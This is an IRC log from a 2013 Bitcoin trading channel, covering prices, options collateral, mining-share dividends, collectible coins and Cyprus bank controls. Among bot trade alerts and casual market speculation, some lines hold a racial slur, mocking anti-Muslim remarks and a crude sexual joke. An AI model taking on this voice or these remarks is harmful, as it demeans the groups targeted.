i just had some pad ped.. shit was extremely spicy Mar 28 00:59:58 i like it though. the food was like.. "Want to eat me? You have to fight for it first." Mar 28 01:00:06 it was delicious. nomnomnom Mar 28 01:02:00 [HAVELOCK] [VTX] 2 @ 0.594 = 1.188 BTC [+] Mar 28 01:02:11 !ticker h vtx Mar 28 01:02:13 [HAVELOCK:VTX] 1D: 0.47000000 / 0.57394246 / 0.70000000 (224 shares, 128.56311141 BTC), 7D: 0.38280000 / 0.42510779 / 0.79900000 (11366 shares, 4831.77511485 BTC), 30D: 0.38280000 / 0.42531821 / 0.79900000 (11489 shares, 4886.48091485 BTC) Mar 28 01:02:31 a so it simmered down some Mar 28 01:04:59 [HAVELOCK] [VTX] 2 @ 0.594 = 1.188 BTC [+] Mar 28 01:08:25 look Ukto, scammer has proof he's better than you https://bitcointalk.org/index.php?topic=154089.msg1658772#msg1658772 Mar 28 01:10:06 wha? Mar 28 01:10:12 not reading just skimmning Mar 28 01:10:17 oh Mar 28 01:10:18 alexa Mar 28 01:11:04 yeah Mar 28 01:11:07 easily faked numbers Mar 28 01:11:12 happy to be mentioned Mar 28 01:11:12 :) Mar 28 01:11:59 [HAVELOCK] [SDICE] 3 @ 0.4389 = 1.3167 BTC [+] Mar 28 01:12:04 Please take under consideration that their site is much more older then BitBillions and the fact that number of shares, meaning fund's popularity, is an important factor in shares future performance. Mar 28 01:12:08 whut Mar 28 01:13:59 [HAVELOCK] [SDICE] 6 @ 0.44 = 2.64 BTC [+] Mar 28 01:14:44 23:32 < Bugpowder> see, I'm not doing that good in terms of total BTC multiplied Mar 28 01:14:47 23:32 < Bugpowder> only 2.35x Mar 28 01:14:53 and what was the risk? Mar 28 01:14:55 did he go all in Mar 28 01:15:53 sux that he left Mar 28 01:16:07 he's been trading for maybe half a year or so Mar 28 01:16:49 I mean in that one big trade today Mar 28 01:16:57 I doubt he risked everything Mar 28 01:17:08 would be stupid, even when you can double your cash Mar 28 01:17:27 i think the 2x thing refers to his entire history. Mar 28 01:18:40 oh, yep Mar 28 01:20:27 mircea_popescu: is it possible to make options, sell them, later buy them back, and have the BTC freed up to use for something else? I don't see why it needs to be kept Mar 28 01:21:14 there's not a way to get collateral back before end of month atm, no. Mar 28 01:21:45 could you add that sometime in the future? I now have BTC tied up that I was hoping would be free Mar 28 01:22:35 that would prolly be a feature for a broker Mar 28 01:22:55 it's not very likely to be added, no. option underwriting is a business, not a casual endeavour. Mar 28 01:23:05 since i have yet to excercise an option i think i need clarification Mar 28 01:23:07 the approach for the retail user is to buy long puts/calls, not to sell shorts. Mar 28 01:23:21 is that to say, if i excercise, i dont get the btc til month's end? Mar 28 01:23:27 ThickAsThieves you get it on the spot. Mar 28 01:23:31 ok Mar 28 01:23:36 so what's he asking? Mar 28 01:23:41 for options debt? Mar 28 01:23:50 mircea_popescu: I see. It seems like you might be able to get more volume though if people have free btc to use more often Mar 28 01:23:58 [HAVELOCK] [VTX] 1 @ 0.594 BTC [+] Mar 28 01:24:07 pizzaman1337 i don't follow your logic. Mar 28 01:24:22 you put up the collateral for an option, you've paid the fare, now you can buy/sell it as many times as you want. Mar 28 01:24:46 the idea is that you do 5000 trades a month but never wider than 500, so you put up collateral for 500. Mar 28 01:25:00 the idea is NOT that you swarm in, make 5000 options, then leave, then swarm in later. Mar 28 01:25:13 the point is to stabilise the bitcoin macroeconomy, not wreck it. Mar 28 01:25:50 [BTCTC] [PAJKA.BOND] 15 @ 0.1078 = 1.617 BTC [+] Mar 28 01:26:58 ;;asks 100000000 Mar 28 01:27:02 There are currently 43462.343 bitcoins offered at or under 100000000.0 USD, worth 355260396.662 USD in total. | Data vintage: 0.0030 seconds Mar 28 01:27:35 ;;bids 0 Mar 28 01:27:35 There are currently 35745145 bitcoins demanded at or over 0.0 USD, worth 9473710.73262 USD in total. | Data vintage: 32.9370 seconds Mar 28 01:27:38 What I did was make put options, sold them, bought the same amount back cheaper, and now I have "locked in" profit. But, the btc are still deposited as surety. Mar 28 01:27:41 ;;ticker Mar 28 01:27:42 BTCUSD ticker | Best bid: 88.40000, Best ask: 88.41001, Bid-ask spread: 0.01001, Last trade: 88.41001, 24 hour volume: 71991.10681540, 24 hour low: 78.40000, 24 hour high: 89.49999, 24 hour vwap: 84.79083 Mar 28 01:27:46 I'll keep that in mind for future trading Mar 28 01:27:56 btc/usd ratio is 216 Mar 28 01:28:05 yeah, you only get it back on month end. Mar 28 01:28:51 taub pretty meaningless metric. Mar 28 01:29:15 i like to look at it where it moves for the short term pressure Mar 28 01:29:35 ya but i mean someone could just put 5 btc at 1mn usd in the book Mar 28 01:29:39 alter it to all hell Mar 28 01:30:19 it only counts the btc in the ask Mar 28 01:30:22 and usd in the bid Mar 28 01:30:41 a ? k Mar 28 01:30:44 let me check Mar 28 01:31:38 yea Mar 28 01:31:45 that's better. Mar 28 01:32:02 https://bitcointalk.org/index.php?topic=148462.0 this one Mar 28 01:32:20 its great, also works with the socketio beta, which has been fantastically stable Mar 28 01:32:31 i dont trade with it, but better than clarkmoody for me Mar 28 01:32:55 and easy to modify Mar 28 01:33:53 http://polimedia.us/dtng/c/src/136442717626.jpg << the latest word in uncomfortable shoes. Mar 28 01:33:55 ;;asks 90 Mar 28 01:33:58 There are currently 2427.7609 bitcoins offered at or under 90.0 USD, worth 217989.998814 USD in total. | Data vintage: 0.0016 seconds Mar 28 01:34:01 ;;bids 87 Mar 28 01:34:01 There are currently 765.14819 bitcoins demanded at or over 87.0 USD, worth 67115.21744 USD in total. | Data vintage: 2.7106 seconds Mar 28 01:34:10 ;;bids 85 Mar 28 01:34:11 There are currently 4163.2509 bitcoins demanded at or over 85.0 USD, worth 357750.134594 USD in total. | Data vintage: 12.4329 seconds Mar 28 01:34:25 the ratio would prolly be better if you divide it by the last price Mar 28 01:34:36 ;;market sell 100 Mar 28 01:34:36 A market order to sell 100 bitcoins right now would net 8824.0000 USD and would take the last price down to 88.2400 USD, resulting in an average price of 88.2400 USD/BTC. | Data vintage: 37.8858 seconds Mar 28 01:34:42 ;;market buy 100 Mar 28 01:34:42 A market order to buy 100 bitcoins right now would take 8865.7279 USD and would take the last price up to 88.7700 USD, resulting in an average price of 88.6573 USD/BTC. | Data vintage: 44.1744 seconds Mar 28 01:34:49 ;;market buy 500 Mar 28 01:34:51 A market order to buy 500 bitcoins right now would take 44608.6915 USD and would take the last price up to 89.5000 USD, resulting in an average price of 89.2174 USD/BTC. | Data vintage: 51.8755 seconds Mar 28 01:34:55 ;;market buy 800 Mar 28 01:34:56 A market order to buy 800 bitcoins right now would take 71528.1483 USD and would take the last price up to 89.8700 USD, resulting in an average price of 89.4102 USD/BTC. | Data vintage: 57.6225 seconds Mar 28 01:35:01 ;;market buy 1000 Mar 28 01:35:02 A market order to buy 1000 bitcoins right now would take 89503.3366 USD and would take the last price up to 89.9000 USD, resulting in an average price of 89.5033 USD/BTC. | Data vintage: 62.6785 seconds Mar 28 01:35:09 wow Mar 28 01:40:33 ;;goxlag Mar 28 01:40:33 1.779934 seconds Mar 28 01:41:56 mp.can i get a deposit cleared Mar 28 01:43:07 looking for big possible retracements, but i dont see it really Mar 28 01:43:13 not yet anyway Mar 28 01:43:46 but i usually dont got top fishing Mar 28 01:44:24 87 very likely, just because that was the range, and it kinda failed to break out of it Mar 28 01:45:03 depth says it would be more likely to go to 86 than to 90 Mar 28 01:45:14 ;;lucky reddit mens's rights Mar 28 01:45:15 http://www.reddit.com/r/MensRights/ Mar 28 01:49:05 waste of energy Mar 28 01:49:08 reactionary Mar 28 01:49:32 smickles i'm guessing that subreddit is blank? Mar 28 01:49:50 mircea_popescu would probably suggest they find women who accept their role in the world Mar 28 01:49:53 BitHub: naw, full of divorce courts screwing men over Mar 28 01:52:07 [BTCTC] [BASIC-MINING] 13 @ 0.34999 = 4.5499 BTC [+] Mar 28 01:52:12 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Mar 28 01:52:50 btw asicminer divs suck now Mar 28 01:52:52 abort Mar 28 01:59:20 look a sd Mar 28 01:59:23 at Mar 28 02:00:54 deposits flusshed. Mar 28 02:07:05 BitHub: they dont suck now Mar 28 02:07:23 they're exactly what was originally contracted for Mar 28 02:07:45 yeah i know but i miss it Mar 28 02:08:01 doesnt bother me Mar 28 02:08:18 remember, friedcat has already ordered the hardware to bring the pool up to 60th Mar 28 02:09:14 oh yeah so if all goes all and implements it divs will be high again Mar 28 02:09:18 maybe much higher Mar 28 02:09:41 hes going to have to start selling boards though Mar 28 02:10:23 did all 600 batch 2 avalon get sold? Mar 28 02:12:23 yeah true, i was going to ask, if they were going to sell a rig or anything? Mar 28 02:12:24 i want Mar 28 02:12:56 batch 2 and 3 i believe Mar 28 02:13:37 er right, I meant 3 Mar 28 02:14:40 yeah all gone Mar 28 02:22:46 [BTCTC] [GSDPT] 50 @ 0.00438 = 0.219 BTC [+] Mar 28 02:26:48 [BTCTC] [GSDPT] 35 @ 0.00438 = 0.1533 BTC [+] Mar 28 02:33:30 neat http://www.theverge.com/2013/3/27/4154206/mozilla-epic-games-bring-unreal-engine-3-to-browser-no-plugins Mar 28 02:36:12 yeah Mar 28 02:36:14 you know what Mar 28 02:36:21 fuck javascript. Mar 28 02:36:55 ok Mar 28 02:41:19 [BTCTC] [ASICMINER-PT] 2 @ 0.739 = 1.478 BTC [+] Mar 28 02:42:58 [MPEX] [S.MPOE] 10200 @ 0.00060554 = 6.1765 BTC [-] Mar 28 02:43:00 [MPEX] [S.MPOE] 1869 @ 0.00060077 = 1.1228 BTC [-] Mar 28 02:47:00 [HAVELOCK] [HIM] 13 @ 1.8 = 23.4 BTC [-] Mar 28 02:54:08 looks like it. i wish i grabbed more avalon 2s Mar 28 02:59:15 ;;bc,nethash Mar 28 02:59:15 47380.435334228248 Mar 28 02:59:24 hrm Mar 28 02:59:45 was stable at 51th for a few days Mar 28 02:59:54 bfl premine? Mar 28 03:04:37 or avalon Mar 28 03:04:41 or AM Mar 28 03:05:04 also india had some internet trouble Mar 28 03:05:24 http://timesofindia.indiatimes.com/world/middle-east/Egypt-catches-divers-cutting-Internet-cable-amid-disruptions/articleshow/19249985.cms Mar 28 03:10:59 [HAVELOCK] [SDICE] 7 @ 0.41100001 = 2.877 BTC [-] Mar 28 03:13:43 [MPEX] [S.DICE] 39 @ 0.00399998 = 0.156 BTC [+] Mar 28 03:15:04 dice.. Mar 28 03:15:09 what r u doin Mar 28 03:15:11 stahp Mar 28 03:20:51 ;;ticker Mar 28 03:20:51 BTCUSD ticker | Best bid: 89.02000, Best ask: 89.02845, Bid-ask spread: 0.00845, Last trade: 89.02845, 24 hour volume: 68638.37125383, 24 hour low: 78.60100, 24 hour high: 89.49999, 24 hour vwap: 85.38873 Mar 28 03:21:24 just need to hang in there 3 or 4 more hours, then buyers will be back Mar 28 03:23:26 topace Mar 28 03:26:37 Luke-Jr level crazy in those comments Mar 28 03:27:12 Mission Unaccomplished. They should have left a note on a Bouy saying" Do Not Disturb, Religion of peace at work". Mar 28 03:27:35 Don't give up peace lovers, you will eventually succeed in cutting those Cables. Mar 28 03:27:49 you say everything is in koran, what do you need internet for??? Mar 28 03:28:08 hehe Mar 28 03:31:23 I think I got a delivery for my casa coin Mar 28 03:31:39 ill get mine tomorrow since apparently i didnt answer the doorbell Mar 28 03:33:19 which coin? Mar 28 03:36:07 molec's 1 btc Mar 28 03:36:17 I think it's a good idea to buy 10 BTC coins Mar 28 03:36:19 I wonder if we will se resistance as we approach 100, or acceleration Mar 28 03:36:21 they appreciate in value Mar 28 03:36:41 I have a 25 and a silver 10 and a handful of 1s Mar 28 03:36:54 the 10 coins go for 20 Mar 28 03:36:54 gave some 25s away a long time ago. Mar 28 03:37:15 well.. the 10s look really really good Mar 28 03:37:21 are the first printings going to go for more? Mar 28 03:37:26 yeap Mar 28 03:37:30 but 2013 versions Mar 28 03:37:58 [HAVELOCK] [VTX] 6 @ 0.595 = 3.57 BTC [+] Mar 28 03:38:57 http://www.ebay.com/itm/190814922588 Mar 28 03:38:58 wow Mar 28 03:39:58 [HAVELOCK] [VTX] 1 @ 0.575 BTC [-] Mar 28 03:41:44 the shipping to canada option is .6 BTC Mar 28 03:41:46 thats.. a lot Mar 28 03:42:45 [BTCTC] [B.YABMC] 1 @ 0.01965 BTC [+] Mar 28 03:42:58 [HAVELOCK] [VTX] 3 @ 0.575 = 1.725 BTC [-] Mar 28 03:43:00 [HAVELOCK] [VTX] 6 @ 0.57 = 3.42 BTC [-] Mar 28 03:43:01 [HAVELOCK] [VTX] 8 @ 0.565 = 4.52 BTC [-] Mar 28 03:43:02 [HAVELOCK] [VTX] 10 @ 0.56 = 5.6 BTC [-] Mar 28 03:43:03 [HAVELOCK] [VTX] 10 @ 0.55 = 5.5 BTC [-] Mar 28 03:43:04 [HAVELOCK] [VTX] 12 @ 0.545 = 6.54 BTC [-] Mar 28 03:43:06 [HAVELOCK] [VTX] 6 @ 0.541 = 3.246 BTC [-] Mar 28 03:43:07 [HAVELOCK] [VTX] 5 @ 0.535 = 2.675 BTC [-] Mar 28 03:43:08 [HAVELOCK] [VTX] 1 @ 0.533 BTC [-] Mar 28 03:43:08 [HAVELOCK] [VTX] 3 @ 0.532 = 1.596 BTC [-] Mar 28 03:43:09 [HAVELOCK] [VTX] 12 @ 0.51245 = 6.1494 BTC [-] Mar 28 03:43:25 [BTCTC] [B.YABMC] 1 @ 0.01966 BTC [+] Mar 28 03:43:57 mhm, one value combo and.. 5 BTC coins Mar 28 03:45:12 burnside can you check the bids on asicminer, they seem out of order Mar 28 03:45:58 burnside nvm Mar 28 03:47:51 nope you are wrong Mar 28 03:48:13 .0032 Mar 28 03:48:18 .0034 Mar 28 03:48:21 .0037 Mar 28 03:48:33 nope Mar 28 03:48:42 oh shit Mar 28 03:48:43 it did Mar 28 03:48:45 heh Mar 28 03:48:49 it does that sometimes Mar 28 03:48:55 it has hit .0008 Mar 28 03:49:00 fatfinger Mar 28 03:49:07 this is not a fatfinger though Mar 28 03:49:13 this is impatience Mar 28 03:49:18 with a shiity month Mar 28 03:49:38 so far no dividends in place Mar 28 03:49:40 $510 for 1 BTC casascius coin?!? Mar 28 03:49:45 yeah, apparently so Mar 28 03:49:48 I have like 10 of those old ones Mar 28 03:50:49 that's just silly Mar 28 03:50:58 falkvinge Mar 28 03:51:08 must be a pumper Mar 28 03:51:09 I'm already thinking.. order up (10) 1 BTCs, one value combo for (1) 25 BTC and (2) 1 BTC.. and (5) 10 BTC all 2013s Mar 28 03:51:09 s.dice down? Mar 28 03:51:22 seems like a good idea Mar 28 03:51:29 http://falkvinge.net/2011/05/29/why-im-putting-all-my-savings-into-bitcoin/ Mar 28 03:51:46 [BTCTC] [BASIC-MINING] 1 @ 0.36 BTC [+] Mar 28 03:52:40 tiber.. thank you for sharing us what you think Mar 28 03:52:43 we appreciate it Mar 28 03:52:44 "6. Finally, a Plea to the Developers Mar 28 03:52:45 Bitcoin has appreciated like crazy, and as described, I predict it will continue to do so. There are already eight decimal places in the system. Please make it possible to use milli- and microbitcoins as soon as possible; bitcoin will continue to climb like crazy and may even accelerate. A currency where the smallest unit can buy you a small house is not practical for everyday use. Mar 28 03:52:45 I would like to be able to use millicoins and microcoins. I know the system can handle it down to 1/100 of a microcoin; please make it possible in the interface as well." Mar 28 03:52:50 why? Mar 28 03:53:31 it wasn't possible at the time Mar 28 03:54:43 I also heard that casa will make 0.5 and 0.1 coins Mar 28 03:54:45 neato Mar 28 03:56:48 is saatoshidice down for maintenance or something? Mar 28 03:57:41 it works for me Mar 28 03:57:55 the counter is down Mar 28 03:57:57 i see the bets Mar 28 03:58:01 selling p310t for .008btc Mar 28 03:58:15 p730t for .0088btc :D Mar 28 03:59:25 Bowjob: thanks Mar 28 04:00:04 1dice9wcMu5hLF4g81u8nioL5mmSHTApw Mar 28 04:00:06 try this Mar 28 04:00:08 48% Mar 28 04:00:14 I mean, 73% Mar 28 04:01:09 jesus christ if joe reddit keeps complaining about millibitcoins I'm going to puke. Mar 28 04:01:32 hey assets Mar 28 04:01:39 who's your bitcoin vendor of choice? Mar 28 04:01:50 theres this guy that accidentally escrowed 42 BTC to the wrong address Mar 28 04:01:51 wow Mar 28 04:02:04 the address probably doesnt exist Mar 28 04:02:37 https://bitcointalk.org/index.php?topic=158175.msg1678798#msg1678798 Mar 28 04:02:56 let those 42 BTC don't go to waste; triple check every address Mar 28 04:03:02 before sending Mar 28 04:03:17 isn't that impossible Mar 28 04:03:23 what is Mar 28 04:03:33 [BTCTC] [ASICMINER-PT] 1 @ 0.681007 BTC [-] Mar 28 04:03:40 permenatly sending to an address that doesn't exist? Mar 28 04:03:45 "^I confirm this as the escrow. Apparently OP copied the wrong address for me from the firstbits system.." Mar 28 04:04:04 "Apparently, 17ifs was not parked, but part of a steganographic message that happened to include it. The address might well belong to nobody at all. ugh..." Mar 28 04:04:11 Bugpowder its impossible to send to an invalid address Mar 28 04:04:11 the funny thing about falkvinge, is he went all in and the exchange rate crashed Mar 28 04:04:22 not to one that's valid but nobody has the keys for Mar 28 04:04:37 So the address exist but no one has the keys for them? Mar 28 04:04:53 ha Mar 28 04:04:56 oops Mar 28 04:05:00 do you understand the protocol, bowjob? Mar 28 04:05:03 like Mar 28 04:05:04 at all? Mar 28 04:05:21 i know a bit.. Mar 28 04:05:29 like wallet.dat has keys, not bitcoins Mar 28 04:05:37 but i dont understand " Mar 28 04:05:39 Apparently, 17ifs was not parked, but part of a steganographic message that happened to include it. The address might well belong to nobody at all. ugh... Mar 28 04:05:40 this part Mar 28 04:05:44 this is why escrow sucks Mar 28 04:06:07 How does adding another wheel improve trust and security? Mar 28 04:06:10 Bowjob you;'re in good company, i have no idea wtf that means either. Mar 28 04:06:35 Bugpowder well if you don't know your cp Mar 28 04:06:47 like, say your best friend has a sister, and you don't know her. Mar 28 04:06:53 so as a measure of safety, you fuck him and he fucks her Mar 28 04:07:03 instead of going directly and catching who knows what. Mar 28 04:07:07 seems riskier Mar 28 04:07:12 male male Mar 28 04:07:24 statistically speaking Mar 28 04:07:54 Along those lines... I think I'll turn in early tonight. See you at 95.00 hours. Mar 28 04:07:59 i'm baffled that nobody seems interested in doing m-of-n transactions Mar 28 04:08:07 i'd say it's more like he fucks her and tells you how it was Mar 28 04:08:14 seems safer if its your brothers sister Mar 28 04:08:26 oh shit nm Mar 28 04:08:47 benkay: probably because there isn't an easy gui for it Mar 28 04:09:03 m-of-n? Mar 28 04:09:03 benkay im not using them because i don't see the benefit really. Mar 28 04:09:11 herding cats. Mar 28 04:09:25 meh Mar 28 04:09:26 http://en.wikipedia.org/wiki/Key_distribution Mar 28 04:09:34 one doesn't have to herd cats Mar 28 04:09:38 a signs tx outputs to a Mar 28 04:09:41 b signs tx outputs to b Mar 28 04:09:47 c waits, then signs to a or b Mar 28 04:09:56 i get the theory. Mar 28 04:10:16 so, cats? Mar 28 04:10:18 yeah. Mar 28 04:10:29 it's the internet. ofc cats Mar 28 04:10:39 moreover, you need to organise a b and c Mar 28 04:11:37 and nothing keeps a from spending the coins in the interim Mar 28 04:11:44 before c oracularizes Mar 28 04:11:54 coins -> inputs Mar 28 04:12:03 yeah. Mar 28 04:12:08 i just thought of something which is probably accounted for, but what if i start an m-of-n, but before the coins are Mar 28 04:12:13 then one of these magical things gets doublespent Mar 28 04:12:15 benkay types faster Mar 28 04:12:24 and you'll need a comission to disentangle the shit Mar 28 04:12:24 i type shorter Mar 28 04:12:25 ;) Mar 28 04:12:43 no commission, the spent inputs are invalid for the escrowed txn Mar 28 04:12:52 ya but Mar 28 04:12:56 [MPEX] [S.DICE] 1 @ 0.0035001 BTC [-] Mar 28 04:12:57 a still owes to b or w/e Mar 28 04:13:18 basically, it;s a bulky impractical geeky solution to a problem that doesn't really exist. Mar 28 04:13:40 this routine sounds familiar Mar 28 04:13:44 exactly the sort of thing bitcoin-geeks implement instead of testing the bitcoin client Mar 28 04:14:04 ;;ticker Mar 28 04:14:04 BTCUSD ticker | Best bid: 87.50000, Best ask: 87.60010, Bid-ask spread: 0.10010, Last trade: 87.64419, 24 hour volume: 67656.57933412, 24 hour low: 79.95000, 24 hour high: 89.49999, 24 hour vwap: 85.76934 Mar 28 04:14:11 https://bitcointalk.org/index.php?topic=154089.0;all Mar 28 04:14:14 this shit is so funny... Mar 28 04:15:10 basically we have mpex ; havelock/bf/btct ; icbit/bitfinex/picostocks/bitbillions/whatever was the other two or three shits Mar 28 04:16:42 oh mircea Mar 28 04:16:46 everyone knows you da keeeng Mar 28 04:17:06 https://www.canadianbitcoins.com/ Mar 28 04:17:11 wowoweewa Mar 28 04:17:57 virtex is trading at 94-93 Mar 28 04:18:58 [HAVELOCK] [VTX] 1 @ 0.55 BTC [+] Mar 28 04:19:26 ugh bitfloor is tres pricey Mar 28 04:19:54 king dongs Mar 28 04:21:41 wheres the top nignogs **** BEGIN LOGGING AT Thu Mar 28 11:06:10 2013 Mar 28 11:06:19 it's a holiday i think they need to relax Mar 28 11:06:33 holiday? Mar 28 11:06:45 in japan? Mar 28 11:06:46 easter weekend Mar 28 11:06:56 ;;asks 94 Mar 28 11:06:59 There are currently 333.01557 bitcoins offered at or under 94.0 USD, worth 31303.4592214 USD in total. | Data vintage: 0.0012 seconds Mar 28 11:07:03 cypriots open in one hour Mar 28 11:07:04 oh yeah, japan is big on easter, lol Mar 28 11:07:07 hehe nah just those that follow that jesus dude Mar 28 11:07:20 Bowjob that'll be fun to watch Mar 28 11:07:30 zombies are cool Mar 28 11:07:38 yeap. i'll watch the markets. heh Mar 28 11:07:49 in cyprus you can only get 300 euro out a day anyway Mar 28 11:08:01 i thought it was 100 Mar 28 11:08:09 might be Mar 28 11:08:10 anyway, im sure they will take what they can Mar 28 11:08:13 cypriots?? Mar 28 11:08:15 but its fuck all Mar 28 11:08:37 oh its 300 Mar 28 11:08:44 cyprus is definitely in holiday mode Mar 28 11:08:44 well,, those 300 adds up. Mar 28 11:09:07 http://www.telegraph.co.uk/finance/financialcrisis/9957481/Cypriots-face-draconian-cash-controls-to-stop-run-on-banks.html Mar 28 11:09:35 id be pissed off if it takes me 1 month to pull 9 grand Mar 28 11:10:47 ;;asks 84 Mar 28 11:10:49 There are currently 0 bitcoins offered at or under 84.0 USD, worth 0.0 USD in total. | Data vintage: 0.0010 seconds Mar 28 11:10:50 ;;asks 94 Mar 28 11:10:51 There are currently 331.00957 bitcoins offered at or under 94.0 USD, worth 31114.8695592 USD in total. | Data vintage: 0.8232 seconds Mar 28 11:10:55 ;;asks 95 Mar 28 11:10:55 There are currently 1358.6874 bitcoins offered at or under 95.0 USD, worth 128551.288164 USD in total. | Data vintage: 5.9807 seconds Mar 28 11:11:03 ;;asks 99 Mar 28 11:11:03 There are currently 10174.928 bitcoins offered at or under 99.0 USD, worth 989746.147981 USD in total. | Data vintage: 13.7487 seconds Mar 28 11:11:20 ;;asks 94 Mar 28 11:11:21 There are currently 331.00957 bitcoins offered at or under 94.0 USD, worth 31114.8695592 USD in total. | Data vintage: 31.2242 seconds Mar 28 11:11:29 Chaang-Noi pm srsly. Mar 28 11:11:31 this bot is slow Mar 28 11:16:20 [MPEX] [S.MPOE] 6433 @ 0.00061111 = 3.9313 BTC [+] Mar 28 11:16:20 where is all the buying coming from? Mar 28 11:17:07 http://www.defectivebydesign.org/no-drm-in-html5 Mar 28 11:17:10 fuckwits. Mar 28 11:17:17 so im guessing html5 is pretty much dead ? Mar 28 11:18:32 mircea_popescu: What's your interest in DRM? Mar 28 11:18:38 it hungers Mar 28 11:19:30 i feel bad for ATC777. he sold at 72, been a bear since. he owes me like 3.5 BTC Mar 28 11:19:33 this rally Mar 28 11:19:37 bgupta i can't stand it. Mar 28 11:20:00 ath Mar 28 11:20:03 Oh so… you are cursing the people the defective by design people are fighting? Mar 28 11:20:14 yea... Mar 28 11:20:26 (DBD is an FSF campaign)... Mar 28 11:20:31 there's a lot of issues involved Mar 28 11:20:39 I was actually at LibrePlanet this past weekend. Mar 28 11:20:44 for one, mixing regulation and standard is possibly the one point where american idiocy shines. Mar 28 11:20:44 so I know the issues. Mar 28 11:21:07 the standard must mesh on reality, and the standard must specifically allow things that are illegal. Mar 28 11:21:15 mp the ONE point? Mar 28 11:21:21 Chaang-Noi i think so. Mar 28 11:21:29 i think you mean A point? one of many? Mar 28 11:21:37 just hit 94 Mar 28 11:21:38 much like a gun will shoot at a child, puppy, policeman or president as well as it will shoot at a bank robber, rapist etc Mar 28 11:21:47 so must every item we ever make be perfectly neutral. Mar 28 11:21:59 Chaang-Noi no i think it's actually THE point. Mar 28 11:22:17 man, i think it shines all over the place Mar 28 11:22:18 THe biggest issue right now, is that big media is fucking the world. Mar 28 11:22:34 i did not know you were so pro usa before Mar 28 11:22:48 bgupta nah, it's that "well meaning" and "polite" idiots are tring to enmesh their _mistaken_ assumptions into the very world they inhabit. Mar 28 11:22:56 this is much akin to dementia. Mar 28 11:23:07 ALl these insane laws that keep popping up are all big media trojan horses.. Mar 28 11:23:31 they're just symptoms of a generalised attempt to make the world more like "it should be" Mar 28 11:23:38 SOPA, PIPA, ACTA, CISPA.. etc. Mar 28 11:23:38 how much do you think one of the first bfl assics, the 60 ghs one would be worth on the open market assuming they shipped next week? Mar 28 11:23:48 Chaang-Noi prolly 5k-ish Mar 28 11:23:58 mp in btc? Mar 28 11:24:02 or usd? Mar 28 11:24:04 no in dollars Mar 28 11:24:05 no they have a stupid monopoly that they are trying to hang onto, and keep printing money Mar 28 11:24:07 ahh Mar 28 11:24:41 copyright laws have run amok.. Mar 28 11:24:48 correction now Mar 28 11:24:50 particularly in the US… Mar 28 11:25:05 here we go Mar 28 11:25:08 going to zero Mar 28 11:25:14 i dont get it, why wait until we get a new ath then sell off, iv seen this more than once Mar 28 11:25:21 trying to cool the market? Mar 28 11:25:50 then a low wall at 92.8 wtf? Mar 28 11:26:09 well if you have a large position the only way to unload is to sell into strength.. Mar 28 11:26:28 91 now Mar 28 11:26:36 94,92 Mar 28 11:26:38 at 90 Mar 28 11:26:41 the hoarders come out Mar 28 11:26:42 to play Mar 28 11:26:42 some chaotic fighting Mar 28 11:26:46 it went from 91 right to 94 the spread is huge Mar 28 11:26:48 i will watch this Mar 28 11:26:59 chang where are you watching from Mar 28 11:27:07 my chair Mar 28 11:27:19 at home Mar 28 11:27:21 mmm. mtgox is still showing 94.34ish Mar 28 11:27:23 derp Mar 28 11:27:25 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.3243953 = 324.3953 BTC [+] Mar 28 11:27:28 link? Mar 28 11:27:39 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.30214597 = 302.146 BTC [+] Mar 28 11:27:42 i watch this shit from coinlab Mar 28 11:27:50 ah just dropped to 93.25 Mar 28 11:28:19 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.27989663 = 279.8966 BTC [+] Mar 28 11:28:33 it froze :| Mar 28 11:28:41 gox lag Mar 28 11:29:43 damn this coinlab changover is lame Mar 28 11:29:44 http://falkvinge.net/2013/03/06/the-target-value-for-bitcoin-is-not-some-50-or-100-it-is-100000-to-1000000/ Mar 28 11:29:52 yea well not for now Mar 28 11:29:59 chaang-over? Mar 28 11:30:04 Chaang-Noi he just copied http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/ one month later :D Mar 28 11:30:05 lol Mar 28 11:30:07 for US folks. Mar 28 11:30:20 ill read it Mar 28 11:32:44 cant wait to see my coin tomorrow.. the one molec sent Mar 28 11:32:54 Someone selling calls? Mar 28 11:33:00 they are nice bowjob Mar 28 11:33:16 pay walls:) Mar 28 11:33:25 toffoo :D Mar 28 11:33:39 is there some javascript way to get past it like NYT ? ;D Mar 28 11:33:41 tor? :) Mar 28 11:33:46 there you go Mar 28 11:33:47 it's a gentle reminder that if you read somebody's stuff daily perhaps you should pay a centy Mar 28 11:33:56 unless he's cookieing me Mar 28 11:34:06 toffoo no. actually there's an artcile mocking the newcomer nyt for their failure Mar 28 11:34:37 (at the time nyt joined trilema had been charging for content for > a year. it's really the first publisher on the web to do it) Mar 28 11:34:56 well its not quite at the top i'm fishing at Mar 28 11:34:57 and Mar 28 11:35:03 it didnt even take out a swing low Mar 28 11:35:04 http://i.imgur.com/CEJf0Rk.png Mar 28 11:35:04 you're a pioneer in so many ways Mar 28 11:35:08 Bullish signal Mar 28 11:35:09 ikr ? Mar 28 11:35:22 the double wizard pattern Mar 28 11:35:26 lol Mar 28 11:35:27 lmao Bowjob Mar 28 11:35:38 that's analytical antisemitism Mar 28 11:36:38 What's interesting is I don't think I will ever plan to convert btc into fiat again.. (Bearing in mind currently btc is a small but ever growing fraction of my networth)… If I need something I will spend my fiat, and keep my btc. If I ever need something beyond the abilities to pay with fiat, I'll pay directly with btc. Mar 28 11:36:58 Chaang-Noi mircea_popescu I wrote an email to friedcat last night asking him to clarify the issue of the "missing" 6 TH ... Mar 28 11:37:01 bgupta that's what i did for ~2 years. Mar 28 11:37:04 i do think we are bound for a big retracement Mar 28 11:37:07 at some point Mar 28 11:37:09 50% why not Mar 28 11:37:15 this has gone up way too fast Mar 28 11:37:24 toffoo lemme know if he answers anything worth the mention then. Mar 28 11:37:30 I don't trade btc/usd. I accept the volitility. Mar 28 11:38:06 I interpret his reply to mean that it's been a space or power issue … I quote: Mar 28 11:38:56 you quote? Mar 28 11:38:57 "The rest devices are waiting to be deployed in the new place, which is under active construction to fit in both the first and the next batch of devices. They should be online sooner than the next batch, which is also close." Mar 28 11:39:16 this doesn't count as worth the mention to me. Mar 28 11:39:37 if i had an ops manager who had the equivalent of asics waiting in boxes for ~2 months i wouldn't just fire him Mar 28 11:39:47 i'd fire him in such a way he's never hired again by anyone anywhere. Mar 28 11:39:49 well I previously didn't know that finding a place for these super chips was an issue Mar 28 11:39:51 unless he 